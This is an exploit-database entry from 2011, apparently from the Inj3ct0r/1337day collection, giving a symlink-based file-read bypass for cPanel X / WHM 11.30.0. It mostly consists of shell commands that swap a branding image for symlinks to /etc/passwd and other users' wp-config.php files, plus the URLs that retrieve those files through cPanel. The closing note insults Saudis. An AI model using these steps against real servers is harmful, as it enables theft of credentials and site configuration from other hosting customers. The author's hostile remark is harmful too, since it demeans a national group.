cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass



EKU-ID: 507 CVE: OSVDB-ID:
Author: ZxH-Labs Published: 2011-06-14 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# cPanel X / WHM  11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase

[+] Exploiting cPanel x ....

At First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)
Okay Now Open SSH or File Manager Then Go to
 
                                                                             /home/user/cpanelbranding/x3


Note : You Can Change x3 Template To Template That You're Running
Okay Now Exeute This Command To Delete File And Make Symlink To read it

# 0x01 : z1d@dns.j0 [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png

The Second Will Work Successfuly Without Any Problem'z !
Okay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No
So .. Execute This Command  :

# 0x021 : z1d@dns.j0 [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x

You'll Get Some Path'z .. So You Can Read it Easily

# 0x03 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x

[+] Reading Data From cPanel X ...

Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X

# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082

Now Show Source And Search About "ui_sprites_bg_snap_to_smallest_width.png"
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Add The Path To Your cPanel To Get File

[+] Full Exploit  of cPanel X ...

Now You'll Open This Link

# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png


[+] Note For All

We All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !

./b0x-j0

[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)